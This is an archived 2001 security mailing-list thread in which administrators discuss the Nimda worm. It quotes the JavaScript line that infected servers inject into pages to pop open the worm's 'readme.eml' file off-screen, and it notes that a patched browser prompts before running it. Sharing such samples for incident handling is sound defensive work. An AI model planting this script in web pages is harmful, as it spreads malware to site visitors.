RE: Some more details on the worm

From: Steiner, Michael (michael.steinerat_private)
Date: Tue Sep 18 2001 - 11:47:36 PDT

  • Next message: Justin Hahn: "Nimda.amm: anecdotal symptoms"

    I have went to several infected web sites to test this exploit and I am
    prompted if I would like to execute.  I am running ie 5.50.4522.1800 with
    128bit encryption, service pack 1, q254518, q279328 and q299618 applied
    
    Michael Steiner
    Senior NT Administrator
    Akamai Technologies, Inc.
    
    Desk:  858-909-3319
    Cell:  858-967-4394
    Pager:  877-981-6158
    
    E Mail Address:  Michael.Steinerat_private
    Pager E Mail:  8779816158at_private
    
    
    
    -----Original Message-----
    From: Davis, Matt [mailto:matt.davisat_private]
    Sent: Tuesday, September 18, 2001 9:44 AM
    To: Davis, Matt
    Cc: NTBUGTRAQat_private; incidentsat_private;
    unisogat_private
    Subject: Some more details on the worm
    
    
    When pages are served up by an infected server, it looks as though
    readme.eml is 'attached' to them.  The server attempts to get the client to
    open them through the following bit of code (from the .dll file):
    
    <script language="JavaScript">window.open("readme.eml", null,
    "resizable=no,top=6000,left=6000")</script>
    
    According to Slashdot, this causes the file to be automatically opened and
    executed by the client.  I haven't been able to confirm or deny that (but if
    someone can, please do).
    
    Regards,
    Matt
    
    
    --
    Matt Davis, MCP
    Intermediate Client Server Business Support Analyst
    COUNTRY(SM) Insurance & Financial Services
    309-821-6288
    mailto:matt.davisat_private
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 16:18:56 PDT